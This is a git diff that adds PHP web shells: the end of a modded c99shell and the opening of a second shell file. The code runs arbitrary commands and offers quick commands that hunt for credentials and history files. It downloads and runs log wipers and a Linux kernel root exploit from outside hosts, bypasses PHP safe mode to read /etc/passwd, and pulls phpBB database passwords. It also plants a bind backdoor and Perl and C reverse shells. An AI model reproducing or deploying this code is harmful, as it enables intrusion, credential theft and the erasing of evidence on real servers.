+     {
+      case 0:  $a2 .= "<font>0</font>"; break;
+      case 32:
+      case 10:
+      case 13: $a2 .= "&nbsp;"; break;
+      default: $a2 .= htmlspecialchars($str[$i]);
+     }
+     $n++;
+     if ($n == $hexdump_rows)
+     {
+      $n = 0;
+      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
+      $a1 .= "<br>";
+      $a2 .= "<br>";
+     }
+    }
+    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
+   }
+   $encoded = "";
+   if ($base64 == 1)
+   {
+    echo "<b>Base64 Encode</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+   }
+   elseif($base64 == 2)
+   {
+    echo "<b>Base64 Encode + Chunk</b><br>";
+    $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
+   }
+   elseif($base64 == 3)
+   {
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+   }
+   elseif($base64 == 4)
+   {
+    $text = file_get_contents($d.$f);
+    $encoded = base64_decode($text);
+    echo "<b>Base64 Decode";
+    if (base64_encode($encoded) != $text) {echo " (failed)";}
+    echo "</b><br>";
+   }
+   if (!empty($encoded))
+   {
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+   }
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+<P>";
+  }
+  elseif ($ft == "html")
+  {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {c99shexit();}
+  }
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
+  elseif ($ft == "phpsess")
+  {
+   echo "<pre>";
+   $v = explode("|",$r);
+   echo $v[0]."<br>";
+   var_dump(unserialize($v[1]));
+   echo "</pre>";
+  }
+  elseif ($ft == "exe")
+  {
+   $ext = explode(".",$f);
+   $c = count($ext)-1;
+   $ext = $ext[$c];
+   $ext = strtolower($ext);
+   $rft = "";
+   foreach($exeftypes as $k=>$v)
+   {
+    if (in_array($ext,$v)) {$rft = $k; break;}
+   }
+   $cmd = str_replace("%f%",$f,$rft);
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
+  }
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
+  elseif ($ft == "code")
+  {
+   if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
+   {
+    $arr = explode("\n",$r);
+    if (count($arr == 18))
+    {
+     include($d.$f);
+     echo "<b>phpBB configuration is detected in this file!<br>";
+     if ($dbms == "mysql4") {$dbms = "mysql";}
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";}
+     echo "Parameters for manual connect:<br>";
+     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+     echo "</b><hr size=\"1\" noshade>";
+    }
+   }
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
+   if (!empty($white)) {@ob_clean();}
+   highlight_file($d.$f);
+   if (!empty($white)) {c99shexit();}
+   echo "</div>";
+  }
+  elseif ($ft == "download")
+  {
+   @ob_clean();
+   header("Content-type: application/octet-stream");
+   header("Content-length: ".filesize($d.$f));
+   header("Content-disposition: attachment; filename=\"".$f."\";");
+   echo $r;
+   exit;
+  }
+  elseif ($ft == "notepad")
+  {
+   @ob_clean();
+   header("Content-type: text/plain");
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";");
+   echo($r);
+   exit;
+  }
+  elseif ($ft == "img")
+  {
+   $inf = getimagesize($d.$f);
+   if (!$white)
+   {
+    if (empty($imgsize)) {$imgsize = 20;}
+    $width = $inf[0]/100*$imgsize;
+    $height = $inf[1]/100*$imgsize;
+    echo "<center><b>Size:</b>&nbsp;";
+    $sizes = array("100","50","20");
+    foreach ($sizes as $v)
+    {
+     echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
+     if ($imgsize != $v ) {echo $v;}
+     else {echo "<u>".$v."</u>";}
+     echo "</a>&nbsp;&nbsp;&nbsp;";
+    }
+    echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
+   }
+   else
+   {
+    @ob_clean();
+    $ext = explode($f,".");
+    $ext = $ext[count($ext)-1];
+    header("Content-type: ".$inf["mime"]);
+    readfile($d.$f);
+    exit;
+   }
+  }
+  elseif ($ft == "edit")
+  {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "<b>Can't write to file!</b>";}
+    else
+    {
+     echo "<b>Saved!</b>";
+     fwrite($fp,$edit_text);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $edit_text;
+    }
+   }
+   $rows = count(explode("\r\n",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+ }
+}
+}
+else
+{
+ @ob_clean();
+ //For simple size- and speed-optimization.
+ $imgequals = array(
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
+  "ext_html"=>array("ext_html","ext_htm"),
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
+  "ext_lnk"=>array("ext_lnk","ext_url"),
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
+  "ext_doc"=>array("ext_doc","ext_dot"),
+  "ext_js"=>array("ext_js","ext_vbs"),
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
+  "ext_wri"=>array("ext_wri","ext_rtf"),
+  "ext_swf"=>array("ext_swf","ext_fla"),
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
+ );
+ if (!$getall)
+ {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
+  if (empty($images[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($images[$img]);
+ }
+ else
+ {
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
+  natsort($images);
+  $k = array_keys($images);
+  echo  "<center>";
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
+  echo "</center>";
+ }
+ exit;
+}
+?>
+</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" height="1" valign="top"><center><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><br/><b>Local Command:</b> <input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center"><br/>
+    <b> Quick Commands </b></div>
+    <form action="<?php echo $surl; ?>">
+      <div align="center">
+        <input type=hidden name=act value="cmd">
+        <input type=hidden name="d" value="<?php echo $dispd; ?>">
+         <SELECT NAME="cmd">
+		 <OPTION VALUE="#"> [File Manipulation]
+		 <OPTION VALUE="">                   
+		 <OPTION VALUE="lsattr -va">List file attributes on a Linux second extended file system
+		 <OPTION VALUE="find / -type f -perm -04000 -ls">Find suid files
+           <OPTION VALUE="find . -type f -perm -04000 -ls">Find suid files in current directory
+           <OPTION VALUE="find / -type f -perm -02000 -ls">Find sgid files
+           <OPTION VALUE="find . -type f -perm -02000 -ls">Find sgid files in current directory
+		    <OPTION VALUE="ls -lia">List you current directory's files, folders, & permissions
+			 <OPTION VALUE="find / -type f -name config.inc.php">Find config.inc.php files
+             <OPTION VALUE="find . -type f -name config.inc.php">Find config.inc.php files in current directory
+             <OPTION VALUE="find / -type f -name "config*">Find config* files
+             <OPTION VALUE="find . -type f -name "config*">Find config* files in current directory
+              <OPTION VALUE="find / -type f -perm -2 -ls">Find all writable files
+             <OPTION VALUE="find . -type f -perm -2 -ls">Find all writable files in current directory
+             <OPTION VALUE="find / -perm -2 -ls">Find all writable directories and files
+	    	 <OPTION VALUE="find . -perm -2 -ls">Find all writable directories and files in current directory
+			 <OPTION VALUE="find / -type f -name service.pwd">Find all service.pwd files
+			 <OPTION VALUE="find . -type f -name service.pwd">Find service.pwd files in current directory
+			 <OPTION VALUE="find / -type f -name .htpasswd">Find all .htpasswd files
+			 <OPTION VALUE="find . -type f -name .htpasswd">Find .htpasswd files in current directory
+			 <OPTION VALUE="find / -type f -name .bash_history">Find all .bash_history files
+			 <OPTION VALUE="find . -type f -name .bash_history">Find .bash_history files in current directory
+			 <OPTION VALUE="find / -type f -name .mysql_history">Find all .mysql_history files
+			<OPTION VALUE="find . -type f -name .mysql_history">Find .mysql_history files in current directory
+			 <OPTION VALUE="find / -type f -name .fetchmailrc">Find all .fetchmailrc files
+			<OPTION VALUE="find . -type f -name .fetchmailrc">Find .fetchmailrc files in current directory
+			<OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs
+			<OPTION VALUE="">                   
+		<OPTION VALUE="#"> [Directory Malipulation]
+		<OPTION VALUE="">                  
+		<OPTION VALUE="pwd">List your current directory
+		<OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Is /etc/ writable?
+		<OPTION VALUE="find /  -type d -perm -2 -ls">Find all writable directories
+<OPTION VALUE="find . -type d -perm -2 -ls">Find all writable directories in current directory
+<OPTION VALUE="find /  -type d -perm -2 -ls">Find all writable directories
+<OPTION VALUE="find . -type d -perm -2 -ls">Find all writable directories in current directory
+<OPTION VALUE="">                   
+<OPTION VALUE="#"> [Miscellaneous Commands]
+<OPTION VALUE="">                   
+           <OPTION VALUE="tar -cvf NEWTAR!!.tar -c <?php passthru('pwd'); ?>">Tar your current directory. (Only works if the directory is writable)
+  <OPTION VALUE="uname -a">Kernel version
+           <OPTION VALUE="w">Logged in users
+           <OPTION VALUE="lastlog">Last users to connect
+           <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins
+           <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">Users without passwords
+            <OPTION VALUE="cat /proc/version /proc/cpuinfo">CpuInfo
+             <OPTION VALUE="netstat -atup | grep IST">Open ports    
+			 <OPTION VALUE="">                                     
+            <OPTION VALUE="#"> [Application Verification]
+			<OPTION VALUE="">                   
+            <OPTION VALUE="which wget curl w3m lynx">Check For Downloaders (WGET, et cetera)
+            <OPTION VALUE="locate gcc">Check For GCC
+			<OPTION VALUE="">                   
+		   <OPTION VALUE="#"> [Log Cleaners]
+		   <OPTION VALUE="">                   
+                    <OPTION VALUE="wget http://packetstormsecurity.org/UNIX/penetration/log-wipers/logcleaner-0.3.c">Wipelogs (Part 1)(Zap3)
+                    <OPTION VALUE="gcc logcleaner-0.3.c -o logcleaner-0.3">Wipelogs (Part 2)(Zap3)
+                    <OPTION VALUE="./logcleaner-0.3 <? echo $_SERVER["REMOTE_ADDR"]; ?>">Wipelogs (Part 3)(Zap3)
+                    <OPTION VALUE="Gone!<? if($_REQUEST['cmd']=="Gone!") { if (file_exists("logcleaner-0.3.c")) { unlink("logcleaner-0.3.c"); } if (file_exists("logcleaner-0.3")) { unlink("logcleaner-0.3"); } } ?>">Remove All Zap3 Traces
+                   <OPTION VALUE="">  
+                    <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/vanish.c">Wipelogs (Part 1)(Vanish)
+                    <OPTION VALUE="gcc vanish.c -o vanish">Wipelogs (Part 2)(Vanish)
+                     <OPTION VALUE="./vanish <? echo exec('whoami'); ?> <? echo $_SERVER["REMOTE_ADDR"]; ?> <? echo gethostbyname($_SERVER["HTTP_HOST"]); ?>">Wipelogs (Part 3)(Vanish)
+                    <OPTION VALUE="Gone!!<? if($_REQUEST['cmd']=="Gone!!") { if (file_exists("vanish.c")) { unlink("vanish.c"); } if (file_exists("vanish")) { unlink("vanish"); } } ?>">Remove All Vanish Traces
+                   <OPTION VALUE=""> 
+                   <OPTION VALUE="#"> [Root Exploits]
+		   <OPTION VALUE=""> 
+                    <OPTION VALUE="wget http://www.synsta.templatez.org/1.txt">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 1)
+                   <OPTION VALUE="mv 1.txt exploit.c">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 2)
+                   <OPTION VALUE="gcc exploit.c -o exploit">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 3)
+                   <OPTION VALUE="./exploit">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 4)
+                   <OPTION VALUE="Gone!!!<? if($_REQUEST['cmd']=="Gone!!!") { if (file_exists("exploit.c")) { unlink("exploit.c"); } if (file_exists("1.txt")) { unlink("1.txt"); } if (file_exists("exploit")) { unlink("exploit"); } } ?>">Remove All Exploit Traces
+                    </SELECT>
+        
+        <input type=hidden name="cmd_txt" value="1">
+        &nbsp;
+        <input type=submit name=submit value="Execute"></div>
+    </form>
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+  <center><br/><b> Kernel Information </b>
+<form action=http://google.com/search name=f><input type=hidden name=client value="firefox-a"><input type=hidden name=rls value="org.mozilla:en-US:official_s"><input type=hidden name=hl value=en><input id=sf maxLength=256 name=q value="<?php echo wordwrap(php_uname()); ?>" size=80>
+&nbsp;
+<input type=submit value="Search" name=btnG></form>
+</center>
+    </td>
+</tr></TABLE>
+<br>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center"><strong>PHP Safe-Mode Bypass (Read Files)    </strong></div>
+    <br>
+    <form action="<?php echo $surl; ?>" method="post">
+      <div align="center">
+      File: <input type="text" name="file"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br>
+      <?php
+      function rsg_read()
+	{	
+	$test="";
+	$temp=tempnam($test, "cx");
+	$file=$_REQUEST['file'];	
+	$get=htmlspecialchars($file);
+	echo "</br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
+	if(copy("compress.zlib://".$file, $temp)){
+	$fichier = fopen($temp, "r");
+	$action = fread($fichier, filesize($temp));
+	fclose($fichier);
+	$source=htmlspecialchars($action);
+
+
+	echo "<div class=\"shell\"></br><b>Reading $get:</b><br><br><textarea rows=10 cols=50>$source</textarea><br>";
+	unlink($temp);
+	} else {
+	echo("</br><FONT COLOR=\"RED\"><CENTER>Sorry... File
+	<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
+	access.</CENTER></FONT>");
+			}
+	echo "</div>";
+	}
+	
+	if(isset($_REQUEST['file']))
+{
+rsg_read();
+}
+	
+	?>
+	
+	<?
+	
+	function rsg_glob()
+{
+$chemin=$_REQUEST['directory'];
+$files = glob("$chemin*");
+echo "</br>Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
+foreach ($files as $filename) {
+	echo "<pre>";
+   echo "$filename\n";
+   echo "</pre>";
+}
+}
+
+if(isset($_REQUEST['directory']))
+{
+rsg_glob();
+}
+
+?>
+
+          <br>
+      </div>
+    </form>
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>
+     <strong>PHP Safe-Mode Bypass (List Directories)</strong>:     
+     <form action="<?php echo $surl; ?>" method="post">
+      <div align="center"><br>
+      Dir: <input type="text" name="directory"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br>
+
+    </form></center>
+    </td>
+</tr></TABLE>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+ <td width="50%" height="1" valign="top"><center>
+   <b>Search</b>
+   <form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td>
+ <td width="50%" height="1" valign="top"><center>
+   <b>Upload</b>
+   <form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td>
+</tr>
+</table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>
+  <b><strong>Create Directory
+  </strong>
+  <p><form action="<?php echo $PHP_SELF; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center>
+    <strong>Create File </strong>
+    <form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table>
+
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>
+  <b>Enter Directory </b>
+  <form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center>
+    <b>Access File</b>
+    <form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table>
+</td>
+</tr>
+</TABLE>
+<br><TABLE width="100%" height=1 border=1 cellPadding=0 cellSpacing=0 borderColorLight=#c0c0c0 borderColorDark=#666666 bgColor=#333333 style="BORDER-COLLAPSE: collapse">
+  <tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99shell modded by <a href=http://w4ck1ng.com class="style1">w4ck1ng</a>. | <? echo("$shver"); ?> | Page generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</p></td></tr></table>
+<br/></body></html><?php chdir($lastdir); c99shexit(); ?>
diff --git a/138shell/W/wacking.php.txt b/138shell/W/wacking.php.txt
new file mode 100644
index 0000000..d870490
--- /dev/null
+++ b/138shell/W/wacking.php.txt
@@ -0,0 +1,2830 @@
+<?php
+if (!function_exists("myshellexec"))
+{
+if(is_callable("popen")){
+function myshellexec($command) {
+if (!($p=popen("($command)2>&1","r"))) {
+return 126;
+}
+while (!feof($p)) {
+$line=fgets($p,1000);
+$out .= $line;
+}
+pclose($p);
+return $out;
+}
+}else{
+function myshellexec($cmd)
+{
+ global $disablefunc;
+ $result = "";
+ if (!empty($cmd))
+ {
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
+  elseif (($result = `$cmd`) !== FALSE) {}
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_resource($fp = popen($cmd,"r")))
+  {
+   $result = "";
+   while(!feof($fp)) {$result .= fread($fp,1024);}
+   pclose($fp);
+  }
+ }
+ return $result;
+}
+}
+}
+
+
+function checkproxyhost(){
+$host = getenv("HTTP_HOST");
+$filename = '/tmp/.setan/xh';
+if (file_exists($filename)) {
+$_POST['proxyhostmsg']="</br></br><center><font color=green size=3><b>Success!</b></font></br></br><a href=$host:6543>$host:6543</a></br></br><b>Note:</b> If '$host' have a good firewall or IDS  installed on their server, it will probably catch this or stop it from ever opening a port and you won't be able to connect to this proxy.</br></br></center>";
+} else {
+$_POST['proxyhostmsg']="</br></br><center><font color=red size=3><b>Failed!</b></font></br></br><b>Note:</b> If for some reason we would not create and extract the need proxy files in '/tmp' this will make this fail.</br></br></center>";
+ } 
+}
+
+if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd"))
+{ 
+ $ip = gethostbyname($_SERVER["HTTP_HOST"]);
+ $por = $_POST['backconnectport'];
+ if(is_writable(".")){
+ cfb("shbd",$backdoor);
+ ex("chmod 777 shbd");
+ $cmd = "./shbd $por";
+ exec("$cmd > /dev/null &");
+ $scan = myshellexec("ps aux"); 
+ if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+ $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+ }else{
+ cfb("/tmp/shbd",$backdoor);
+ ex("chmod 777 /tmp/shbd");
+ $cmd = "./tmp/shbd $por";
+ exec("$cmd > /dev/null &");
+ $scan = myshellexec("ps aux"); 
+ if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+ $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+}
+} 
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl"))
+{
+ if(is_writable(".")){
+ cf("back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ if (file_exists("back")) { unlink("back"); }
+ }else{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ if (file_exists("/tmp/back")) { unlink("/tmp/back"); }
+}
+} 
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C"))
+{
+ if(is_writable(".")){
+ cf("backc",$back_connect_c);
+ ex("chmod 777 backc");
+ //$blah = ex("gcc back.c -o backc");
+ $blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ //if (file_exists("back.c")) { unlink("back.c"); }
+ if (file_exists("backc")) { unlink("backc"); }
+ }else{
+ ex("chmod 777 /tmp/backc");
+ cf("/tmp/backc",$back_connect_c);
+ //$blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ //if (file_exists("back.c")) { unlink("back.c"); }
+ if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); } }
+}
+
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or err();
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+function cfb($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or bberr();
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+function err()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't connect!</b>";
+}
+
+function bberr()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>";
+}
+
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+
+ini_set("memory_limit","300M");
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
